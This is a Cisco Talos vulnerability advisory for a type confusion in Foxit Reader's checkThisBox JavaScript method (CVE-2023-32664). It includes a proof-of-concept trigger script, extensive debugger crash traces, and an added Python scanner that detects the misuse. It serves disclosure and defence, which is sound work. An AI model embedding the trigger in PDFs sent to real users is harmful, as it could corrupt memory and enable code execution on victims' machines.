CVE-2023-32664: TALOS-2023-1795 || Cisco Talos Intelligence Group
SUMMARY
A type confusion vulnerability exists in the Javascript checkThisBox method as implemented in Foxit Reader 12.1.2.15332. A specially-crafted Javascript code inside a malicious PDF document can cause memory corruption and lead to remote code execution. User would need to open a malicious file to trigger the vulnerability.
CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Foxit Reader 12.1.2.15332
PRODUCT URLS
Foxit Reader - https://www.foxitsoftware.com/pdf-reader/
CVSSv3 SCORE
8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE
CWE-843 - Access of Resource Using Incompatible Type (‘Type Confusion’)
DETAILS
Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.
The PDF JavaScript API defines the checkThisBox method to check or uncheck widgets such as a check box or radio button. The first parameter (nWidget) is the index of an individual widget. The second parameter is optional and defaults to true, which checks the widget. A type confusion occurs when the checkThisBox method is called with an object of a type other than Integer as nWidget. To demonstrate, the following code triggers this vulnerability:
    function main() {
        // Attach the calculate and format actions to the text field, then run f11 directly.
        getField("Text Field1").setAction("Calculate", 'f15();');
        getField("Text Field1").setAction("Format", 'f11();');
        f11();
    }

    function f11(arg1, arg2, arg3) {
        app.activeDocs[0].deletePages();
        app.fs.transitions;
        // nWidget is passed as a string rather than an Integer, which triggers the type confusion.
        app.activeDocs[0].getField('Radio Button0').checkThisBox('a');
    }

    function f15(arg1, arg2, arg3) {
        event.value = 0;
    }
Note that the same vulnerability can be triggered with the defaultIsChecked method, which also takes nWidget as its first parameter. The following can be observed in the debugger (with PageHeap enabled):
0:000> g
Breakpoint 0 hit
eax=006ae408 ebx=006ae474 ecx=02b96430 edx=00000000 esi=441ceff8 edi=31514ff8
eip=02e5e239 esp=006ae3e0 ebp=006ae420 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02e5e239 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0xf79370 (02b96430)} ; [1]
0:000> g
Breakpoint 1 hit
eax=04cbcf48 ebx=31514f01 ecx=1cb96c54 edx=2998afe8 esi=105926e0 edi=1cb96c50
eip=01bae4c7 esp=006ae2a8 ebp=006ae2b8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4e7147:
01bae4c7 56 push esi ; [2]
0:000> dd esi
105926e0 00000002 00000000 23225680 105925c0
105926f0 00000000 232338e8 00000001 00000001
10592700 00000000 00000004 00000000 00000000
10592710 00000006 00000000 0000002a 00000000
10592720 00000000 10594560 00000010 0000000c
10592730 10595f5c 10595f38 0000000a 00000000
10592740 00010106 10592710 00000000 00000000
10592750 00000000 105945a0 00000010 00000002
0:000> u
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4e7147:
01bae4c7 56 push esi
01bae4c8 ff5060 call dword ptr [eax+60h] ; [3]
01bae4cb 8bd8 mov ebx,eax
01bae4cd 85db test ebx,ebx
01bae4cf 7808 js FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4e7159 (01bae4d9)
01bae4d1 56 push esi
01bae4d2 8bcf mov ecx,edi
01bae4d4 e827ee0000 call FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f5f80 (01bbd300)
0:000> ba w4 105926e0+0xC ; [4]
0:000> g
Breakpoint 0 hit
eax=006ad9e8 ebx=006ada54 ecx=02b30420 edx=00000000 esi=4ac88ff8 edi=4ac86ff8
eip=02e5e239 esp=006ad9c0 ebp=006ada00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02e5e239 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0xf13360 (02b30420)}
0:000> g
Breakpoint 5 hit ; [5]
eax=0000001f ebx=04c40a58 ecx=00000007 edx=62626952 esi=04c40a58 edi=105926ec
eip=04519e0b esp=006ad77c ebp=006ad7a0 iopl=0 nv up ei pl nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200203
FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x43d6db:
04519e0b 83c704 add edi,4
0:000> dd 105926e0
105926e0 00000001 0000001f 0000001f 62626952
105926f0 00000000 232338e8 00000000 00000001
10592700 00000000 00000004 00000000 00000000
10592710 00000006 00000000 0000002a 00000000
10592720 00000000 10594560 00000010 0000000c
10592730 10595f5c 10595f38 0000000a 00000000
10592740 00010106 10592710 00000000 00000000
10592750 00000000 105945a0 00000010 00000002
0:000> da 105926ec
105926ec "Ribb"
0:000> kb L3
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 006ad7a0 011ba996 04c40a58 ffffffff 105926e0 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x43d6db
01 006ad7d4 011b9b65 1471ada0 006ad7b0 00000014 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x4100f6
02 006ad7e8 011b82be 1471ada0 006ad814 00adcc1b FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x40f2c5
0:000> g
Breakpoint 5 hit ; [6]
eax=2a75eff2 ebx=1c758fa0 ecx=00000022 edx=00000001 esi=2a75efd0 edi=105926ec
eip=04519ded esp=006ad6f8 ebp=006ad718 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x43d6bd:
04519ded f30f7f4f10 movdqu xmmword ptr [edi+10h],xmm1 ds:002b:105926fc=00736e6f6974704f6e61635374736f50
0:000> dd 105926e0
105926e0 00000001 00000011 00000011 006f0048
105926f0 00690072 006f007a 0074006e 74736f50
10592700 6e616353 6974704f 00736e6f 00000000
10592710 00000006 00000000 0000002a 00000000
10592720 00000000 10594560 00000010 0000000c
10592730 10595f5c 10595f38 0000000a 00000000
10592740 00010106 10592710 00000000 00000000
10592750 00000000 105945a0 00000010 00000002
0:000> du 105926e0+0xc
105926ec "Horizont潐瑳捓湡灏楴湯s"
0:000> kb L3
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 006ad718 0214ae48 00000011 2a75efd0 23233ba8 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x43d6bd
01 006ad730 01cfd04e 2a75efd0 006ad758 6b2f6f34 FoxitPDFReader!safe_vsnprintf+0x52dd88
02 006ad73c 6b2f6f34 23233ba8 2a75efd0 00000000 FoxitPDFReader!safe_vsnprintf+0xdff8e
0:000> g
Breakpoint 0 hit
eax=006ad9e0 ebx=006ada4c ecx=02b32520 edx=00000000 esi=33d8aff8 edi=33d88ff8
eip=02e5e239 esp=006ad9b8 ebp=006ad9f8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02e5e239 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0xf15460 (02b32520)}
0:000> g
Breakpoint 2 hit
eax=10592860 ebx=00000001 ecx=1cb96c50 edx=00000000 esi=00000000 edi=1cb96c50
eip=01bbd319 esp=006ae15c ebp=006ae170 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f5f99:
01bbd319 8bc8 mov ecx,eax
0:000> g
Breakpoint 2 hit
eax=105926e0 ebx=0074006e ecx=1cb96c50 edx=00000000 esi=00000000 edi=1cb96c50
eip=01bbd319 esp=006ae28c ebp=006ae2a0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f5f99:
01bbd319 8bc8 mov ecx,eax ; [7]
0:000> dd eax
105926e0 00000001 00000011 00000011 006f0048
105926f0 00690072 006f007a 0074006e 006c0061
10592700 00490020 0077006e 00720061 00000064
10592710 00000006 00000000 0000002a 00000000
10592720 00000000 10594560 00000010 0000000c
10592730 10595f5c 10595f38 0000000a 00000000
10592740 00010106 10592710 00000000 00000000
10592750 00000000 105945a0 00000010 00000002
0:000> du 105926e0+0xc
105926ec "Horizontal Inward"
0:000> p
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01bbd31b esp=006ae28c ebp=006ae2a0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f5f9b:
01bbd31b e8e0db3a00 call FoxitPDFReader!safe_vsnprintf+0x34de40 (01f6af00) ; [8]
0:000> t
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af00 esp=006ae288 ebp=006ae2a0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34de40:
01f6af00 55 push ebp
0:000> p
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af01 esp=006ae284 ebp=006ae2a0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34de41:
01f6af01 8bec mov ebp,esp
0:000>
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af03 esp=006ae284 ebp=006ae284 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34de43:
01f6af03 8b5508 mov edx,dword ptr [ebp+8] ss:002b:006ae28c=00000000
0:000>
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af06 esp=006ae284 ebp=006ae284 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34de46:
01f6af06 85d2 test edx,edx
0:000>
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af08 esp=006ae284 ebp=006ae284 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x34de48:
01f6af08 7817 js FoxitPDFReader!safe_vsnprintf+0x34de61 (01f6af21) [br=0]
0:000>
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af0a esp=006ae284 ebp=006ae284 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x34de4a:
01f6af0a 3b5118 cmp edx,dword ptr [ecx+18h] ds:002b:105926f8=0074006e
0:000>
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af0d esp=006ae284 ebp=006ae284 iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200293
FoxitPDFReader!safe_vsnprintf+0x34de4d:
01f6af0d 7d12 jge FoxitPDFReader!safe_vsnprintf+0x34de61 (01f6af21) [br=0]
0:000>
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af0f esp=006ae284 ebp=006ae284 iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200293
FoxitPDFReader!safe_vsnprintf+0x34de4f:
01f6af0f 83c110 add ecx,10h
0:000>
eax=105926e0 ebx=0074006e ecx=105926f0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af12 esp=006ae284 ebp=006ae284 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!safe_vsnprintf+0x34de52:
01f6af12 3b5108 cmp edx,dword ptr [ecx+8] ds:002b:105926f8=0074006e
0:000>
eax=105926e0 ebx=0074006e ecx=105926f0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af15 esp=006ae284 ebp=006ae284 iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200293
FoxitPDFReader!safe_vsnprintf+0x34de55:
01f6af15 7d10 jge FoxitPDFReader!safe_vsnprintf+0x34de67 (01f6af27) [br=0]
0:000>
eax=105926e0 ebx=0074006e ecx=105926f0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af17 esp=006ae284 ebp=006ae284 iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200293
FoxitPDFReader!safe_vsnprintf+0x34de57:
01f6af17 8b4104 mov eax,dword ptr [ecx+4] ds:002b:105926f4=006f007a
0:000>
eax=006f007a ebx=0074006e ecx=105926f0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af1a esp=006ae284 ebp=006ae284 iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200293
FoxitPDFReader!safe_vsnprintf+0x34de5a:
01f6af1a 8b0490 mov eax,dword ptr [eax+edx*4] ds:002b:006f007a=3f3f3f3f ; [9]
dd 006f007a
006f007a 3f3f3f3f 3f3f3f3f 3f3f3f3f 3f3f3f3f
006f008a 3f3f3f3f 3f3f3f3f 3f3f3f3f 3f3f3f3f
006f009a 3f3f3f3f 3f3f3f3f 3f3f3f3f 3f3f3f3f
006f00aa 3f3f3f3f 3f3f3f3f 3f3f3f3f 3f3f3f3f
006f00ba 3f3f3f3f 3f3f3f3f 3f3f3f3f 3f3f3f3f
006f00ca 3f3f3f3f 3f3f3f3f 3f3f3f3f 3f3f3f3f
At [1], the Field.checkThisBox method is called, which eventually calls a method at [3]. The pointer passed as an argument to that method is examined at [2]. At [4], a breakpoint is set on write access to the memory pointed to by that pointer. The breakpoint is hit at [5] and [6], where the pointer is treated as a string object and a string is written to it; this is the type confusion condition. Later, at [7], the confused pointer is passed as the this argument to the method called at [8], where it is dereferenced. No crash occurs here because the memory read at [9] happens to be allocated and contains the value 0x3f3f3f3f. The crash occurs later, when the memory pointed to by 0x3f3f3f3f is dereferenced, as the debugger output at the time of the crash shows:
0:000>
eax=2998afe8 ebx=1cb96c50 ecx=2998afe8 edx=2998afe8 esi=00000000 edi=1cb96c50
eip=01bb75db esp=006ae240 ebp=006ae280 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f025b:
01bb75db 8b4508 mov eax,dword ptr [ebp+8] ss:002b:006ae288=3f3f3f3f
0:000>
eax=3f3f3f3f ebx=1cb96c50 ecx=2998afe8 edx=2998afe8 esi=00000000 edi=1cb96c50
eip=01bb75de esp=006ae240 ebp=006ae280 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f025e:
01bb75de 8b7808 mov edi,dword ptr [eax+8] ds:002b:3f3f3f47=????????
0:000>
(1544.1cd4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=3f3f3f3f ebx=1cb96c50 ecx=2998afe8 edx=2998afe8 esi=00000000 edi=1cb96c50
eip=01bb75de esp=006ae240 ebp=006ae280 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f025e:
01bb75de 8b7808 mov edi,dword ptr [eax+8] ds:002b:3f3f3f47=????????
0:000> dd 3f3f3f47
3f3f3f47 ???????? ???????? ???????? ????????
3f3f3f57 ???????? ???????? ???????? ????????
3f3f3f67 ???????? ???????? ???????? ????????
3f3f3f77 ???????? ???????? ???????? ????????
3f3f3f87 ???????? ???????? ???????? ????????
3f3f3f97 ???????? ???????? ???????? ????????
3f3f3fa7 ???????? ???????? ???????? ????????
3f3f3fb7 ???????? ???????? ???????? ????????
0:000> g
(1544.1cd4): Access violation - code c0000005 (!!! second chance !!!)
eax=3f3f3f3f ebx=1cb96c50 ecx=2998afe8 edx=2998afe8 esi=00000000 edi=1cb96c50
eip=01bb75de esp=006ae240 ebp=006ae280 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f025e:
01bb75de 8b7808 mov edi,dword ptr [eax+8] ds:002b:3f3f3f47=????????
0:000> u
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f025e:
01bb75de 8b7808 mov edi,dword ptr [eax+8]
01bb75e1 8b4308 mov eax,dword ptr [ebx+8]
01bb75e4 897de8 mov dword ptr [ebp-18h],edi
01bb75e7 85c0 test eax,eax
01bb75e9 7404 je FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f026f (01bb75ef)
01bb75eb 8b08 mov ecx,dword ptr [eax]
01bb75ed eb02 jmp FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f0271 (01bb75f1)
01bb75ef 33c9 xor ecx,ecx
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 006ae280 01bbd32a 3f3f3f3f 00000001 1cb96c50 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f025e
01 006ae2a0 01bae4d9 105926e0 1421ef01 105926e0 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f5faa
02 006ae2b8 01f6a085 105926e0 006ae2d8 ea3b87ec FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4e7159
03 006ae328 02bb96c8 00000000 1421ef01 00000001 FoxitPDFReader!safe_vsnprintf+0x34cfc5
04 006ae384 02b96582 1421eff8 00000001 006ae3ac FoxitPDFReader!safe_vsnprintf+0xf9c608
05 006ae3d8 02e5e23b 1421eff8 006ae408 006ae400 FoxitPDFReader!safe_vsnprintf+0xf794c2
06 006ae420 030425ab 4ba77600 4f4ecf71 4ba77600 FoxitPDFReader!FXJSE_GetClass+0x26b
07 006ae488 03041d6e 006ae4d0 4f4ecf71 006ae5ac FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3c9b
08 006ae51c 03042025 006ae54c 4ba77600 006ae5ac FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e345e
09 006ae564 03041eab 006ae57c 00000006 006ae5bc FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3715
0a 006ae580 0326432b 00000006 006ae5bc 4ba77600 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e359b
0b 006ae5a0 03200389 3fb82339 4f4ed7d5 0000000c FoxitPDFReader!CFXJSE_Arguments::GetValue+0x405a1b
0c 006ae5e4 03200389 4f4feb6d 3fb82339 3fb82339 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1a79
0d 006ae620 03200389 4f4feb6d 4f551e41 4f551ea5 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1a79
0e 006ae64c 031fea10 4f4feb6d 3fb821b1 4f551e41 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1a79
0f 006ae664 031fe839 00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a0100
10 006ae690 02e9aa8e 4ba77600 3fb82339 4f551e41 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39ff29
11 006ae7a0 02e9a5a2 006ae934 4ba77600 006ae7fc FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c17e
12 006ae828 02e832a4 006ae934 4ba77600 44937024 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bc92
13 006ae9d8 02e82da0 006aea74 44937050 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24994
14 006ae9ec 02e5c7af 006aea74 44937050 ea3b8ea0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24490
15 006aea64 02e5d0e6 44937024 44930ff8 44937010 FoxitPDFReader!FXJSE_Runtime_Release+0xd5f
16 006aeaa0 02ad4a14 366e8fd8 0d2d84f4 44930ff8 FoxitPDFReader!FXJSE_ExecuteScript+0x86
17 006aeb04 02ad5900 00000000 006aeb90 006aeb38 FoxitPDFReader!safe_vsnprintf+0xeb7954
18 006aeb18 0107119d 006aeb90 006aeb38 ea3b8f8c FoxitPDFReader!safe_vsnprintf+0xeb8840
19 006aeb48 01070064 2a62ef40 00000015 006aeb70 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c68fd
1a 006aeb88 0106eae0 232b2660 1471ada0 3d640fb8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c57c4
1b 006aebdc 0099a522 006aec0c 1471ada0 3d640fb8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c4240
1c 006aec2c 00bf76db 00000000 ea3b9c94 7fffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x8a02
1d 006af850 042ad52b 00000000 00000000 ea3b9de4 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x64bcb
1e 006af920 042ae704 00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1d0dfb
1f 006af944 042a90aa 00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1d1fd4
20 006af9b8 042a991d 44f90e20 002b0330 00000429 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1cc97a
21 006af9d8 76dd23a3 002b0330 00000429 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1cd1ed
22 006afa04 76dc30b6 042a98e9 002b0330 00000429 USER32!_InternalCallWinProc+0x2b
23 006afafc 76dc1975 042a98e9 00000000 00000429 USER32!UserCallWinProcCheckWow+0x4c6
24 006afb78 76dc14c0 00000429 006afba0 00b7d3c4 USER32!DispatchMessageWorker+0x4a5
25 006afb84 00b7d3c4 0f43eec8 0f43eec8 06117798 USER32!DispatchMessageW+0x10
26 006afba0 00b7d483 06117798 00b7d3f0 ffffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128684
27 006afbc0 046cb2fe 00000000 06143b14 077b8000 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128743
28 006afbd8 04490cc0 00760000 00000000 0c194360 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5eebce
29 006afc24 75f67d59 077b8000 75f67d40 006afc8c FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x3b4590
2a 006afc34 772fb74b 077b8000 afc13d74 00000000 KERNEL32!BaseThreadInitThunk+0x19
2b 006afc8c 772fb6cf ffffffff 7732867c 00000000 ntdll!__RtlUserThreadStart+0x2b
2c 006afc9c 00000000 04490d8f 077b8000 00000000 ntdll!_RtlUserThreadStart+0x1b
In the above debugger output, the value of eax, 0x3f3f3f3f, was obtained from the type-confused pointer. The crash occurs when eax is dereferenced as if it were an object pointer. Depending on the memory layout of the process, it may be possible to obtain arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.
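As an added illustration, not part of the Talos advisory or of Foxit's code: a small Python scanner that pulls the stream bodies out of a PDF (inflating FlateDecode streams) and flags any checkThisBox or defaultIsChecked call whose first argument is not an integer literal, which is the misuse described above. The PDF layout it parses and the sample document it builds are constructed for this example; real documents may carry the script in object streams or behind other filters, which this scanner does not handle.

```python
import re
import zlib

# Field methods the advisory names as taking nWidget as their first argument.
WIDGET_INDEX_METHODS = ("checkThisBox", "defaultIsChecked")

# A call to one of those methods, capturing the first argument (the text up to
# the first comma or closing parenthesis).
_CALL_RE = re.compile(r"\.(%s)\s*\(\s*([^,)]*)" % "|".join(WIDGET_INDEX_METHODS))
# A PDF stream body; only the plain "stream\n...\nendstream" layout is handled.
_STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
_INT_LITERAL_RE = re.compile(r"^[+-]?\d+$")


def extract_scripts(pdf_bytes):
    """Return every stream body as text, inflating FlateDecode streams.

    Non-zlib streams are kept raw. Object streams and other filters are out of
    scope for this illustration.
    """
    scripts = []
    for match in _STREAM_RE.finditer(pdf_bytes):
        raw = match.group(1)
        try:
            # decompressobj still yields the data if the delimiter regex ate a
            # trailing checksum byte (a plain zlib.decompress would raise).
            raw = zlib.decompressobj().decompress(raw)
        except zlib.error:
            pass  # not Flate-encoded (or corrupt): scan the raw bytes instead
        # latin-1 maps every byte to a code point, so binary streams decode too
        scripts.append(raw.decode("latin-1"))
    return scripts


def find_suspicious_widget_calls(pdf_bytes):
    """Flag checkThisBox/defaultIsChecked calls whose nWidget is not an integer literal.

    Returns (method, first_argument) tuples. A variable name is reported too,
    since its runtime type cannot be checked statically; an empty argument list
    is not reported because there is nothing to type-check.
    """
    findings = []
    for script in extract_scripts(pdf_bytes):
        for method, first_arg in _CALL_RE.findall(script):
            arg = first_arg.strip()
            if arg == "" or _INT_LITERAL_RE.match(arg):
                continue
            findings.append((method, arg))
    return findings


def build_sample_pdf():
    """Constructed PDF fragment (not a real document) holding one Flate-compressed
    JavaScript stream, so the scanner can be exercised offline."""
    js = (
        b"function f11() {\n"
        b"  app.activeDocs[0].getField('Radio Button0').checkThisBox('a');\n"
        b"  this.getField('Check Box1').checkThisBox(0, true);\n"
        b"  this.getField('Radio Button0').defaultIsChecked(idx);\n"
        b"}\n"
    )
    body = zlib.compress(js)
    return (
        b"%PDF-1.7\n1 0 obj\n<< /S /JavaScript /JS 2 0 R >>\nendobj\n"
        b"2 0 obj\n<< /Length " + str(len(body)).encode() + b" /Filter /FlateDecode >>\n"
        b"stream\n" + body + b"\nendstream\nendobj\n%%EOF\n"
    )


if __name__ == "__main__":
    for method, arg in find_suspicious_widget_calls(build_sample_pdf()):
        print("non-integer nWidget passed to %s: %s" % (method, arg))
```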
VENDOR RESPONSE
Foxit provided patches here: https://www.foxit.com/downloads/#Foxit-Reader/ and here: https://www.foxit.com/downloads/#Foxit-PhantomPDF-Business/
TIMELINE
2023-07-03 - Vendor Disclosure
2023-07-19 - Vendor Patch Release
2023-07-19 - Public Release
Discovered by Kamlapati Choubey and Aleksandar Nikolic of Cisco Talos.